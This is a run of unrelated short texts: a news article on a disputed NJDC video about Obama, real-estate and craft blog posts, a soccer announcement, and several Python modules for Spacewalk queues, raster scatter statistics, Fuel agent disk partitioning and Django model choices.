A source involved in the making of a disputed video that shows Israelis praising President Obama denied that the video had been selectively edited. The video, released last month by the National Jewish Democratic Council, features Israelis lauding Obama as a pro-Israel president. Many of those interviewed were residents of Sderot, a town that routinely faces rocket fire from Palestinian terrorists. "Today, we're hearing what Israelis living on the front lines think," boasted NJDC president David Harris after the video was released. However, an Israeli resident of Sderot familiar with many of those interviewed has accused the NJDC of deliberately altering the interviews. The NJDC is the current target of a $60 million defamation lawsuit for claiming that prominent Jewish philanthropist Sheldon Adelson encourages prostitution. David Farer, a denizen of Sderot, claimed recently in Pajamas Media that his neighbors’ views had been inaccurately portrayed by the NJDC, which he says "misleadingly edited or dishonestly encouraged" those being recorded. Interviewees, Farer maintains, were led to believe that they were appearing in a video thanking the United States for its support of Israel and for the Iron Dome missile defense system—not an election-year video personally thanking Obama. NJDC officials did not respond to a request for comment. However, a Jewish Democrat involved in the video’s creation told the Free Beacon that Farer is lying. "No one who was interviewed had their comments taken out of context," the source said. "All of the translations adhere to the meaning of the original Hebrew [and] all of the interview subjects knew what they were being interviewed for." Asked to clarify what exactly interviewees were told prior to recording, the source said there "was a verbal agreement that they [those on camera] were being interviewed for a video to thank President Obama." 
None of those captured on camera signed a release form, the source said, noting, "It was all verbal." One of the subjects of the film, Sasson Sara, is quoted saying of Obama: "Sderot is important to him. The Jewish people are important to him. The state of Israel is important to him." But Sara now claims the NJDC edited his words before and after the quote to significantly alter its meaning. The full quote, he said, should include "If" before the initial statement, and the words, "then Obama should do more about Iran" at the end. The Jewish Democrat who helped make the video denied this accusation. "It’s just not correct," the source said, referring to the entire PJ Media story, which the source deemed "absurd." "Any accusations they made about the translations of the language used in the final video is patently false," the Democrat said. "Obviously, it would be idiotic to release a video where the subtitle didn’t match up with what was being said in the video." According to Farer’s PJ Media account, many of the participants were not aware that they were appearing in a political video intended to convince pro-Israel Americans that Israelis want Obama to be re-elected. The source involved in the video’s creation said that many of those interviewed actually knew the videographer, who was formerly employed by "a world-renowned media outlet known for its impartiality." The source would not reveal exactly which media outlet he was referring to. "I spoke with somebody today and that person assured me that the interviewees were made fully aware of what the project was for—a video thanking president Obama." The NJDC scandal comes on the heels of a series of high-profile snafus for Democratic National Committee Chair Debbie Wasserman Schultz (D., Fla.), who claimed in a recent speech that the Israeli ambassador told her Republicans are "dangerous for Israel." 
After her words were reported, she claimed that the reporter who filed the story had "deliberately misquoted" her, a claim subsequently disproven when the reporter disclosed audio of the Wasserman Schultz speech that fully vindicated his quote. Wasserman Schultz made it clear to the Free Beacon that she would not apologize for maligning the reporter. Meanwhile, a new poll of Israelis shows that the public is deeply skeptical of the president. The survey of Jews and Arabs alike found Romney beating Obama 48 percent to 21 percent. Among voters affiliated with the conservative Likud party, Romney is winning 77 percent to 5 percent. This entry was posted in Politics and tagged Israel, Jewish Community, Obama Campaign, Sheldon Adelson, Video. Bookmark the permalink.
"""
Module for taskomatic related functions (inserting into queues, etc)
"""

from spacewalk.server import rhnSQL


class RepodataQueueEntry(object):

    def __init__(self, channel, client, reason, force=False,
                 bypass_filters=False):
        self.channel = channel
        self.client = client
        self.reason = reason
        self.force = force
        self.bypass_filters = bypass_filters


class RepodataQueue(object):

    def _boolean_as_char(boolean):
        if boolean:
            return 'Y'
        else:
            return 'N'
    _boolean_as_char = staticmethod(_boolean_as_char)

    def add(self, entry):
        h = rhnSQL.prepare("""
            insert into rhnRepoRegenQueue
                   (id, channel_label, client, reason, force, bypass_filters,
                    next_action, created, modified)
            values (
                sequence_nextval('rhn_repo_regen_queue_id_seq'),
                :channel, :client, :reason, :force, :bypass_filters,
                current_timestamp, current_timestamp, current_timestamp
            )
        """)
        h.execute(channel=entry.channel, client=entry.client,
                  reason=entry.reason,
                  force=self._boolean_as_char(entry.force),
                  bypass_filters=self._boolean_as_char(entry.bypass_filters))


def add_to_repodata_queue(channel, client, reason, force=False,
                          bypass_filters=False):
    if reason == '':
        reason = None
    entry = RepodataQueueEntry(channel, client, reason, force, bypass_filters)
    queue = RepodataQueue()
    queue.add(entry)


# XXX not the best place for this...
def add_to_repodata_queue_for_channel_package_subscription(affected_channels,
                                                           batch, caller):
    tmpreason = []
    for package in batch:
        tmpreason.append(package.short_str())
    reason = " ".join(tmpreason)
    for channel in affected_channels:
        # truncate the reason so we don't cause an error in the db
        add_to_repodata_queue(channel, caller, reason[:128])
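Two small behaviors of the module above are easy to demonstrate in isolation: the Y/N flag conversion for the `force`/`bypass_filters` columns, and the 128-character truncation applied to the reason string before it is queued. A standalone sketch — the helper names here are illustrative, not the module's API:

```python
def boolean_as_char(boolean):
    """Map a Python bool to the CHAR(1) 'Y'/'N' flag the queue table stores."""
    return 'Y' if boolean else 'N'


def build_reason(packages, limit=128):
    """Join package descriptions and truncate to the DB column width,
    mirroring the reason[:128] slice in the module above."""
    return " ".join(packages)[:limit]


print(boolean_as_char(True))                      # Y
print(build_reason(["pkg-a-1.0", "pkg-b-2.1"]))   # pkg-a-1.0 pkg-b-2.1
```

Truncating in Python rather than letting the insert fail keeps one oversized reason string from aborting the whole queue update.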
Great opportunity for horse lovers, hunters, and recreational riders. The 150 +/- ridgetop acres are the standout of this listing, but it also offers a farmhouse that can be lived in comfortably while you customize it to your needs, or while you play or hunt on the property. Then again, you might want to select one of the many nice building sites to start a new chapter in a new home on this exceptional acreage. For horse lovers, several nice riding trails are already established. According to the owner, this property features two Native American mounds (of course, you'd want to explore that claim further). It was also once the site of the old Lively Ridge Schoolhouse. Some nice pasture with partial fencing presents many possibilities for tailoring the land to your needs. In addition to public water, there is a cistern system for garden watering. The property is a nice combination of woodlands and fields (approximately 150 acres) and is also close to Zaleski State Forest. It offers a great opportunity for the nature lover or the person who wants to be out and removed, yet within 30 minutes of Athens and in close proximity to McArthur. Acreage of 135 +/- could be bought separately.
import time
import threading
import multiprocessing
from itertools import izip
from multiprocessing import Process, Manager, Lock, Queue, Pool
from os import kill

import numpy as np
from osgeo import gdal
from scipy.optimize import curve_fit
from scipy.stats import linregress
from pysal.esda import mapclassify
import brewer2mpl

from pgeo.gis.raster import get_nodata_value
from pgeo.utils.log import logger
from pgeo.error.custom_exceptions import PGeoException

log = logger("pgeo.gis.raster_scatter")


def create_scatter(raster_path1, raster_path2, band1=1, band2=1, buckets=200,
                   intervals=6, workers=3, forced_min1=0, forced_min2=0,
                   color='Reds', color_type='Sequential', reverse=False):
    log.info(workers)
    ds1 = gdal.Open(raster_path1)
    ds2 = gdal.Open(raster_path2)

    rows1 = ds1.RasterYSize
    cols1 = ds1.RasterXSize
    rows2 = ds2.RasterYSize
    cols2 = ds2.RasterXSize

    log.info("Scatter Processing")
    if cols1 != cols2 or rows1 != rows2:
        log.error("The rasters cannot be processed because they have different dimensions")
        log.error("%sx%s %sx%s" % (rows1, cols1, rows2, cols2))
        raise PGeoException("The rasters cannot be processed because they have different dimensions",
                            status_code=404)

    band1 = ds1.GetRasterBand(band1)
    array1 = np.array(band1.ReadAsArray()).flatten()
    nodata1 = band1.GetNoDataValue()

    band2 = ds2.GetRasterBand(band2)
    array2 = np.array(band2.ReadAsArray()).flatten()
    nodata2 = band2.GetNoDataValue()

    # min/max calculation
    (min1, max1) = band1.ComputeRasterMinMax(0)
    step1 = (max1 - min1) / buckets
    (min2, max2) = band2.ComputeRasterMinMax(0)
    step2 = (max2 - min2) / buckets

    # Calculation of the frequencies
    statistics = couples_with_freq_multiprocess(array1, array2, step1, step2,
                                                min1, min2, max1, max2,
                                                forced_min1, forced_min2,
                                                nodata1, nodata2, workers)

    series = get_series(statistics["scatter"].values(), intervals, color,
                        color_type, reverse)

    result = dict()
    result["series"] = series
    result["stats"] = statistics["stats"]

    # free the datasets and arrays
    del ds1
    del ds2
    del array1
    del array2
    return result


def worker(arr1, arr2, step1, step2, out_q):
    d = dict()
    try:
        # TODO: move it from here: calculation of the regression coefficients
        # TODO: add a boolean to make the coefficient computation optional
        slope, intercept, r_value, p_value, std_err = linregress(arr1, arr2)
        d["stats"] = {
            "slope": slope,
            "intercept": intercept,
            "r_value": r_value,
            "p_value": p_value,
            "std_err": std_err
        }
        d["scatter"] = {}
        heatmap, xedges, yedges = np.histogram2d(arr1, arr2, bins=200)
        for x in range(0, len(xedges) - 1):
            for y in range(0, len(yedges) - 1):
                if heatmap[x][y] > 0:
                    d["scatter"][str(xedges[x]) + "_" + str(yedges[y])] = {
                        "data": [xedges[x], yedges[y]],
                        "freq": heatmap[x][y]
                    }
        log.info("worker end")
        out_q.put(d)
        out_q.close()
    except PGeoException, e:
        log.error(e.get_message())
        raise PGeoException(e.get_message(), e.get_status_code())


def couples_with_freq_multiprocess(array1, array2, step1, step2, min1, min2,
                                   max1, max2, forced_min1, forced_min2,
                                   nodata1=None, nodata2=None, workers=3,
                                   rounding=0):
    log.info("couples_with_freq_multiprocess")
    start_time = time.time()

    index1 = (array1 > forced_min1) & (array1 <= max1) & (array1 != nodata1)
    index2 = (array2 > forced_min2) & (array2 <= max2) & (array2 != nodata2)

    # merge array indexes
    compound_index = index1 & index2
    del index1
    del index2

    # create two filtered arrays from the two original arrays
    arr1 = array1[compound_index]
    arr2 = array2[compound_index]
    del array1
    del array2

    length_interval = len(arr1) / workers
    length_end = length_interval
    length_start = 0

    out_q = Queue()
    procs = []
    for x in range(0, len(arr1), length_interval):
        a1 = arr1[length_start:length_end]
        a2 = arr2[length_start:length_end]
        p = multiprocessing.Process(target=worker, args=(a1, a2, step1, step2, out_q))
        procs.append(p)
        p.start()
        length_start = x + length_interval
        length_end = length_end + length_interval

    del arr1
    del arr2

    resultdict = []
    for i in range(workers):
        resultdict.append(out_q.get())

    # check if the process was mono core
    log.info("Workers %s ", workers)
    if workers <= 1:
        for p in procs:
            p.join()
        log.info("Computation done in %s seconds ---" % str(time.time() - start_time))
        return resultdict[0]
    else:
        log.info("Merging dictionaries")
        final_dict = dict()
        for d in resultdict:
            for key, value in d.iteritems():
                try:
                    final_dict[key]["freq"] += d[key]["freq"]
                except:
                    final_dict[key] = d[key]
        for p in procs:
            p.terminate()
            try:
                # TODO: check the side effects of this workaround
                kill(p.pid, 9)
            except:
                pass
        log.info("Computation done in %s seconds ---" % str(time.time() - start_time))
        return final_dict


class SummingThread(threading.Thread):

    def __init__(self, array1, array2, step1, step2):
        super(SummingThread, self).__init__()
        self.array1 = array1
        self.array2 = array2
        self.step1 = step1
        self.step2 = step2

    def run(self):
        self.d = dict()
        log.info("length of: %s", len(self.array1))
        for item_a, item_b in izip(self.array1, self.array2):
            value1 = round(item_a / self.step1, 2)
            value2 = round(item_b / self.step2, 2)
            key = str(value1) + "_" + str(value2)
            try:
                self.d[key]["freq"] += 1
            except:
                self.d[key] = {
                    "data": [item_a, item_b],
                    "freq": 1
                }


def couples_with_freq_slow(array1, array2, step1, step2, min1, min2, max1, max2,
                           rows, cols, buckets, nodata=None):
    d = dict()
    for i in range(0, len(array1)):
        if array1[i] > min1 and array2[i] > min2:
            value1 = str(int(array1[i] / step1))
            value2 = str(int(array2[i] / step2))
            key = value1 + "_" + value2
            # TODO: this should be a rounding, otherwise the last one wins
            value = [array1[i], array2[i]]
            freq = 1
            if key in d:
                freq = d[key]["freq"] + 1
            d[key] = {
                "data": value,
                "freq": freq
            }
    return d


def couples_with_freq_split(array1, array2, step1, step2, min1, min2, max1, max2,
                            forced_min1, forced_min2, nodata1=None, nodata2=None,
                            rounding=0):
    # TODO: the rounding should probably be calculated from the step interval
    log.info("Calculating frequencies")
    start_time = time.time()
    d = dict()

    index1 = (array1 > forced_min1) & (array1 <= max1) & (array1 != nodata1)
    index2 = (array2 > forced_min2) & (array2 <= max2) & (array2 != nodata2)

    # merge array indexes
    compound_index = index1 & index2

    # create two filtered arrays from the two original arrays
    arr1 = array1[compound_index]
    arr2 = array2[compound_index]

    for item_a, item_b in izip(arr1, arr2):
        value1 = round(item_a / step1, 0)
        value2 = round(item_b / step2, 0)
        key = str(value1) + "_" + str(value2)
        try:
            d[key]["freq"] += 1
        except:
            d[key] = {
                "data": [item_a, item_b],
                "freq": 1
            }
    log.info("Computation done in %s seconds ---" % str(time.time() - start_time))
    return d


def couples_with_freq(array1, array2, step1, step2, min1, min2, max1, max2,
                      forced_min1, forced_min2, nodata1=None, nodata2=None,
                      rounding=0):
    '''
    Uses a boolean filter, which is slightly faster than the where condition.
    :param array1:
    :param array2:
    :param step1:
    :param step2:
    :param min1:
    :param min2:
    :param max1:
    :param max2:
    :param forced_min1:
    :param forced_min2:
    :param nodata1:
    :param nodata2:
    :param rounding:
    :return:
    '''
    # TODO: the rounding should probably be calculated from the step interval
    log.info("Calculating frequencies")
    start_time = time.time()
    d = dict()

    index1 = (array1 > forced_min1) & (array1 <= max1) & (array1 != nodata1)
    index2 = (array2 > forced_min2) & (array2 <= max2) & (array2 != nodata2)

    # merge array indexes
    compound_index = index1 & index2

    # create two filtered arrays from the two original arrays
    arr1 = array1[compound_index]
    arr2 = array2[compound_index]

    for item_a, item_b in izip(arr1, arr2):
        value1 = round(item_a / step1, 0)
        value2 = round(item_b / step2, 0)
        key = str(value1) + "_" + str(value2)
        try:
            d[key]["freq"] += 1
        except:
            d[key] = {
                "data": [item_a, item_b],
                "freq": 1
            }
    log.info("Computation done in %s seconds ---" % str(time.time() - start_time))
    return d


def couples_with_freq_old(array1, array2, step1, step2, min1, min2, max1, max2,
                          forced_min1, forced_min2, nodata1=None, nodata2=None,
                          rounding=0):
    # TODO: the rounding should probably be calculated from the step interval
    log.info("Calculating frequencies")
    start_time = time.time()
    d = dict()
    for i in np.where((array1 > forced_min1) & (array1 <= max1) & (array1 != nodata1)):
        for j in np.where((array2 > forced_min2) & (array2 <= max2) & (array2 != nodata2)):
            for index in np.intersect1d(i, j):
                val1 = array1[index]
                val2 = array2[index]
                value1 = int(val1 / step1)
                value2 = int(val2 / step2)
                key = str(value1) + "_" + str(value2)
                try:
                    d[key]["freq"] += 1
                except:
                    d[key] = {
                        "data": [val1, val2],
                        "freq": 1
                    }
    log.info("Computation done in %s seconds ---" % str(time.time() - start_time))
    return d


# TODO: move it
def classify_values(values, k=5, classification_type="Jenks_Caspall"):
    # TODO: switch between the various classification types
    # (move to a dedicated classification python file instead of here)
    start_time = time.time()
    array = np.array(values)
    result = mapclassify.Jenks_Caspall_Forced(array, k)
    log.info("Classification done in %s seconds ---" % str(time.time() - start_time))
    return result.bins


def get_series(values, intervals, color, color_type, reverse=False):
    classification_values = []
    for v in values:
        classification_values.append(float(v['freq']))
    classes =
classify_values(classification_values, intervals) #bmap = brewer2mpl.get_map('RdYlGn', 'Diverging', 9, reverse=True) bmap = brewer2mpl.get_map(color, color_type, intervals+1, reverse=reverse) colors = bmap.hex_colors # creating series series = [] for color in colors: #print color series.append({ "color": color, "data" : [] }) #print classes for v in values: freq = v['freq'] for i in range(len(classes)): if freq <= classes[i]: series[i]['data'].append([float(v['data'][0]), float(v['data'][1])]) break return series
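All of the `couples_with_freq*` variants above share one keying scheme: each `(value1, value2)` pair is divided by its step, rounded, and the joined bin pair becomes a dictionary key counting co-occurrences. A minimal self-contained sketch of that scheme (it runs under either Python 2 or 3; `bin_pairs` is an illustrative name, not part of this module):

```python
# Self-contained sketch of the key/frequency scheme used by the
# couples_with_freq* functions above: divide each value by its step,
# round to the bin, and count how often each bin pair occurs.
def bin_pairs(values1, values2, step1, step2):
    d = {}
    for a, b in zip(values1, values2):
        key = "%s_%s" % (round(a / step1, 0), round(b / step2, 0))
        if key in d:
            d[key]["freq"] += 1
        else:
            # first occurrence keeps the raw pair as representative data
            d[key] = {"data": [a, b], "freq": 1}
    return d

pairs = bin_pairs([1.0, 1.1, 5.0], [2.0, 2.1, 9.0], step1=1.0, step2=1.0)
# the first two pairs fall into the same bin "1.0_2.0"; the third gets its own
```

As in the real functions, only the first pair seen in a bin is stored under `"data"`, which is why the module carries the TODO about the last/first value winning instead of a proper rounding.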
I was finding it difficult to come up with new ideas for some cards, and even after flicking through some old magazines and books I still couldn’t come up with anything. But then I started to look back at some previous cards I have made, and I got an idea from two previous designs that I joined together. This is made using the watercolour stamping technique, where you ink up your stamp and spritz it with water before stamping onto watercolour paper. The September ATC swap theme for ukstampers is ‘watercolour’, so I have used Oriental watercolours as my inspiration for my three swaps. I have used various sprays and a variety of techniques to make the background papers, using leaves as masks and also masking paper.
# Copyright 2014 Mirantis, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import math from fuel_agent.drivers import ks_spaces_validator from fuel_agent import errors from fuel_agent import objects from fuel_agent.openstack.common import log as logging from fuel_agent.utils import hardware_utils as hu LOG = logging.getLogger(__name__) def match_device(hu_disk, ks_disk): """Tries to figure out if hu_disk got from hu.list_block_devices and ks_spaces_disk given correspond to the same disk device. This is the simplified version of hu.match_device :param hu_disk: A dict representing disk device how it is given by list_block_devices method. :param ks_disk: A dict representing disk device according to ks_spaces format. :returns: True if hu_disk matches ks_spaces_disk else False. 
""" uspec = hu_disk['uspec'] # True if at least one by-id link matches ks_disk if ('DEVLINKS' in uspec and len(ks_disk.get('extra', [])) > 0 and any(x.startswith('/dev/disk/by-id') for x in set(uspec['DEVLINKS']) & set(['/dev/%s' % l for l in ks_disk['extra']]))): return True # True if one of DEVLINKS matches ks_disk id if (len(ks_disk.get('extra', [])) == 0 and 'DEVLINKS' in uspec and 'id' in ks_disk and '/dev/%s' % ks_disk['id'] in uspec['DEVLINKS']): return True return False class Nailgun(object): def __init__(self, data): # Here data is expected to be raw provisioning data # how it is given by nailgun self.data = data def partition_data(self): return self.data['ks_meta']['pm_data']['ks_spaces'] @property def ks_disks(self): disk_filter = lambda x: x['type'] == 'disk' and x['size'] > 0 return filter(disk_filter, self.partition_data()) @property def ks_vgs(self): vg_filter = lambda x: x['type'] == 'vg' return filter(vg_filter, self.partition_data()) @property def hu_disks(self): """Actual disks which are available on this node it is a list of dicts which are formatted other way than ks_spaces disks. To match both of those formats use _match_device method. """ if not getattr(self, '_hu_disks', None): self._hu_disks = hu.list_block_devices(disks=True) return self._hu_disks def _disk_dev(self, ks_disk): # first we try to find a device that matches ks_disk # comparing by-id and by-path links matched = [hu_disk['device'] for hu_disk in self.hu_disks if match_device(hu_disk, ks_disk)] # if we can not find a device by its by-id and by-path links # we try to find a device by its name fallback = [hu_disk['device'] for hu_disk in self.hu_disks if '/dev/%s' % ks_disk['name'] == hu_disk['device']] found = matched or fallback if not found or len(found) > 1: raise errors.DiskNotFoundError( 'Disk not found: %s' % ks_disk['name']) return found[0] def _getlabel(self, label): if not label: return '' # XFS will refuse to format a partition if the # disk label is > 12 characters. 
return ' -L {0} '.format(label[:12]) def _get_partition_count(self, name): count = 0 for disk in self.ks_disks: count += len([v for v in disk["volumes"] if v.get('name') == name and v['size'] > 0]) return count def _num_ceph_journals(self): return self._get_partition_count('cephjournal') def _num_ceph_osds(self): return self._get_partition_count('ceph') def partition_scheme(self): LOG.debug('--- Preparing partition scheme ---') data = self.partition_data() ks_spaces_validator.validate(data) partition_scheme = objects.PartitionScheme() ceph_osds = self._num_ceph_osds() journals_left = ceph_osds ceph_journals = self._num_ceph_journals() LOG.debug('Looping over all disks in provision data') for disk in self.ks_disks: LOG.debug('Processing disk %s' % disk['name']) LOG.debug('Adding gpt table on disk %s' % disk['name']) parted = partition_scheme.add_parted( name=self._disk_dev(disk), label='gpt') # we install bootloader on every disk LOG.debug('Adding bootloader stage0 on disk %s' % disk['name']) parted.install_bootloader = True # legacy boot partition LOG.debug('Adding bios_grub partition on disk %s: size=24' % disk['name']) parted.add_partition(size=24, flags=['bios_grub']) # uefi partition (for future use) LOG.debug('Adding UEFI partition on disk %s: size=200' % disk['name']) parted.add_partition(size=200) LOG.debug('Looping over all volumes on disk %s' % disk['name']) for volume in disk['volumes']: LOG.debug('Processing volume: ' 'name=%s type=%s size=%s mount=%s vg=%s' % (volume.get('name'), volume.get('type'), volume.get('size'), volume.get('mount'), volume.get('vg'))) if volume['size'] <= 0: LOG.debug('Volume size is zero. Skipping.') continue if volume.get('name') == 'cephjournal': LOG.debug('Volume seems to be a CEPH journal volume. 
' 'Special procedure is supposed to be applied.') # We need to allocate a journal partition for each ceph OSD # Determine the number of journal partitions we need on # each device ratio = math.ceil(float(ceph_osds) / ceph_journals) # No more than 10GB will be allocated to a single journal # partition size = volume["size"] / ratio if size > 10240: size = 10240 # This will attempt to evenly spread partitions across # multiple devices e.g. 5 osds with 2 journal devices will # create 3 partitions on the first device and 2 on the # second if ratio < journals_left: end = ratio else: end = journals_left for i in range(0, end): journals_left -= 1 if volume['type'] == 'partition': LOG.debug('Adding CEPH journal partition on ' 'disk %s: size=%s' % (disk['name'], size)) prt = parted.add_partition(size=size) LOG.debug('Partition name: %s' % prt.name) if 'partition_guid' in volume: LOG.debug('Setting partition GUID: %s' % volume['partition_guid']) prt.set_guid(volume['partition_guid']) continue if volume['type'] in ('partition', 'pv', 'raid'): LOG.debug('Adding partition on disk %s: size=%s' % (disk['name'], volume['size'])) prt = parted.add_partition(size=volume['size']) LOG.debug('Partition name: %s' % prt.name) if volume['type'] == 'partition': if 'partition_guid' in volume: LOG.debug('Setting partition GUID: %s' % volume['partition_guid']) prt.set_guid(volume['partition_guid']) if 'mount' in volume and volume['mount'] != 'none': LOG.debug('Adding file system on partition: ' 'mount=%s type=%s' % (volume['mount'], volume.get('file_system', 'xfs'))) partition_scheme.add_fs( device=prt.name, mount=volume['mount'], fs_type=volume.get('file_system', 'xfs'), fs_label=self._getlabel(volume.get('disk_label'))) if volume['type'] == 'pv': LOG.debug('Creating pv on partition: pv=%s vg=%s' % (prt.name, volume['vg'])) lvm_meta_size = volume.get('lvm_meta_size', 64) # The reason for that is to make sure that # there will be enough space for creating logical volumes. 
# Default lvm extension size is 4M. Nailgun volume # manager does not care of it and if physical volume size # is 4M * N + 3M and lvm metadata size is 4M * L then only # 4M * (N-L) + 3M of space will be available for # creating logical extensions. So only 4M * (N-L) of space # will be available for logical volumes, while nailgun # volume manager might reguire 4M * (N-L) + 3M # logical volume. Besides, parted aligns partitions # according to its own algorithm and actual partition might # be a bit smaller than integer number of mebibytes. if lvm_meta_size < 10: raise errors.WrongPartitionSchemeError( 'Error while creating physical volume: ' 'lvm metadata size is too small') metadatasize = int(math.floor((lvm_meta_size - 8) / 2)) metadatacopies = 2 partition_scheme.vg_attach_by_name( pvname=prt.name, vgname=volume['vg'], metadatasize=metadatasize, metadatacopies=metadatacopies) if volume['type'] == 'raid': if 'mount' in volume and volume['mount'] != 'none': LOG.debug('Attaching partition to RAID ' 'by its mount point %s' % volume['mount']) partition_scheme.md_attach_by_mount( device=prt.name, mount=volume['mount'], fs_type=volume.get('file_system', 'xfs'), fs_label=self._getlabel(volume.get('disk_label'))) # this partition will be used to put there configdrive image if partition_scheme.configdrive_device() is None: LOG.debug('Adding configdrive partition on disk %s: size=20' % disk['name']) parted.add_partition(size=20, configdrive=True) LOG.debug('Looping over all volume groups in provision data') for vg in self.ks_vgs: LOG.debug('Processing vg %s' % vg['id']) LOG.debug('Looping over all logical volumes in vg %s' % vg['id']) for volume in vg['volumes']: LOG.debug('Processing lv %s' % volume['name']) if volume['size'] <= 0: LOG.debug('Lv size is zero. 
Skipping.') continue if volume['type'] == 'lv': LOG.debug('Adding lv to vg %s: name=%s, size=%s' % (vg['id'], volume['name'], volume['size'])) lv = partition_scheme.add_lv(name=volume['name'], vgname=vg['id'], size=volume['size']) if 'mount' in volume and volume['mount'] != 'none': LOG.debug('Adding file system on lv: ' 'mount=%s type=%s' % (volume['mount'], volume.get('file_system', 'xfs'))) partition_scheme.add_fs( device=lv.device_name, mount=volume['mount'], fs_type=volume.get('file_system', 'xfs'), fs_label=self._getlabel(volume.get('disk_label'))) LOG.debug('Appending kernel parameters: %s' % self.data['ks_meta']['pm_data']['kernel_params']) partition_scheme.append_kernel_params( self.data['ks_meta']['pm_data']['kernel_params']) return partition_scheme def configdrive_scheme(self): LOG.debug('--- Preparing configdrive scheme ---') data = self.data configdrive_scheme = objects.ConfigDriveScheme() LOG.debug('Adding common parameters') admin_interface = filter( lambda x: (x['mac_address'] == data['kernel_options']['netcfg/choose_interface']), [dict(name=name, **spec) for name, spec in data['interfaces'].iteritems()])[0] ssh_auth_keys = data['ks_meta']['authorized_keys'] if data['ks_meta']['auth_key']: ssh_auth_keys.append(data['ks_meta']['auth_key']) configdrive_scheme.set_common( ssh_auth_keys=ssh_auth_keys, hostname=data['hostname'], fqdn=data['hostname'], name_servers=data['name_servers'], search_domain=data['name_servers_search'], master_ip=data['ks_meta']['master_ip'], master_url='http://%s:8000/api' % data['ks_meta']['master_ip'], udevrules=data['kernel_options']['udevrules'], admin_mac=data['kernel_options']['netcfg/choose_interface'], admin_ip=admin_interface['ip_address'], admin_mask=admin_interface['netmask'], admin_iface_name=admin_interface['name'], timezone=data['ks_meta'].get('timezone', 'America/Los_Angeles'), ks_repos=dict(map(lambda x: x.strip('"').strip("'"), item.split('=')) for item in data['ks_meta']['repo_metadata'].split(',')) ) 
LOG.debug('Adding puppet parameters') configdrive_scheme.set_puppet( master=data['ks_meta']['puppet_master'], enable=data['ks_meta']['puppet_enable'] ) LOG.debug('Adding mcollective parameters') configdrive_scheme.set_mcollective( pskey=data['ks_meta']['mco_pskey'], vhost=data['ks_meta']['mco_vhost'], host=data['ks_meta']['mco_host'], user=data['ks_meta']['mco_user'], password=data['ks_meta']['mco_password'], connector=data['ks_meta']['mco_connector'], enable=data['ks_meta']['mco_enable'] ) LOG.debug('Setting configdrive profile %s' % data['profile']) configdrive_scheme.set_profile(profile=data['profile']) return configdrive_scheme def image_scheme(self, partition_scheme): LOG.debug('--- Preparing image scheme ---') data = self.data image_scheme = objects.ImageScheme() # We assume for every file system user may provide a separate # file system image. For example if partitioning scheme has # /, /boot, /var/lib file systems then we will try to get images # for all those mount points. Images data are to be defined # at provision.json -> ['ks_meta']['image_data'] LOG.debug('Looping over all file systems in partition scheme') for fs in partition_scheme.fss: LOG.debug('Processing fs %s' % fs.mount) if fs.mount not in data['ks_meta']['image_data']: LOG.debug('There is no image for fs %s. Skipping.' % fs.mount) continue image_data = data['ks_meta']['image_data'][fs.mount] LOG.debug('Adding image for fs %s: uri=%s format=%s container=%s' % (fs.mount, image_data['uri'], image_data['format'], image_data['container'])) image_scheme.add_image( uri=image_data['uri'], target_device=fs.device, # In the future we will get format and container # from provision.json, but currently it is hard coded. format=image_data['format'], container=image_data['container'], ) return image_scheme
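The ceph-journal branch of `partition_scheme` above spreads OSD journal partitions across the available journal devices and caps each partition at 10 GiB. The arithmetic can be sketched standalone; `journal_layout` is our illustrative helper, not part of the fuel_agent API, and it uses integer division where the driver divides the raw volume size:

```python
import math

# Hedged sketch of the journal-spreading arithmetic in partition_scheme
# above: ceil(osds / journal devices) partitions per device, each capped
# at 10 GiB, stopping once every OSD has a journal.
def journal_layout(ceph_osds, ceph_journals, volume_size):
    ratio = int(math.ceil(float(ceph_osds) / ceph_journals))
    size = min(volume_size // ratio, 10240)  # no more than 10 GiB per journal
    layout = []
    left = ceph_osds
    for _ in range(ceph_journals):
        n = min(ratio, left)   # don't create more journals than OSDs remain
        layout.append(n)
        left -= n
    return size, layout

# 5 OSDs over 2 journal devices: 3 partitions on the first, 2 on the second,
# matching the comment in the driver code above
size, layout = journal_layout(5, 2, 40960)
```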
The Hahnville High School Soccer team is sponsoring “Future Tiger Night” when the Tigers host Destrehan in some key district matches on Friday, January 25, 2008 at HHS. There will be three games that evening. The HHS girls begin at 5 p.m., the varsity boys start at approximately 6:30, and the boys’ junior varsity will follow. Any youth player who wears their soccer uniform jersey will be admitted to the games at no charge. Anyone accompanying a “Future Tiger” will be charged admission. The HHS soccer booster club will also salute the senior players at their final regular-season home game.
class Choices(object): """ A class to encapsulate handy functionality for lists of choices for a Django model field. Each argument to ``Choices`` is a choice, represented as either a string, a two-tuple, or a three-tuple. If a single string is provided, that string is used as the database representation of the choice as well as the human-readable presentation. If a two-tuple is provided, the first item is used as the database representation and the second the human-readable presentation. If a triple is provided, the first item is the database representation, the second a valid Python identifier that can be used as a readable label in code, and the third the human-readable presentation. This is most useful when the database representation must sacrifice readability for some reason: to achieve a specific ordering, to use an integer rather than a character field, etc. Regardless of what representation of each choice is originally given, when iterated over or indexed into, a ``Choices`` object behaves as the standard Django choices list of two-tuples. If the triple form is used, the Python identifier names can be accessed as attributes on the ``Choices`` object, returning the database representation. (If the single or two-tuple forms are used and the database representation happens to be a valid Python identifier, the database representation itself is available as an attribute on the ``Choices`` object, returning itself.) 
""" def __init__(self, *choices): self._full = [] self._choices = [] self._choice_dict = {} for choice in self.equalize(choices): self._full.append(choice) self._choices.append((choice[0], choice[2])) self._choice_dict[choice[1]] = choice[0] def equalize(self, choices): for choice in choices: if isinstance(choice, (list, tuple)): if len(choice) == 3: yield choice elif len(choice) == 2: yield (choice[0], choice[0], choice[1]) else: raise ValueError("Choices can't handle a list/tuple of length %s, only 2 or 3" % len(choice)) else: yield (choice, choice, choice) def __len__(self): return len(self._choices) def __iter__(self): return iter(self._choices) def __getattr__(self, attname): try: return self._choice_dict[attname] except KeyError: raise AttributeError(attname) def __getitem__(self, index): return self._choices[index] def __repr__(self): return '%s(%s)' % (self.__class__.__name__, ', '.join(("%s" % str(i) for i in self._full)))
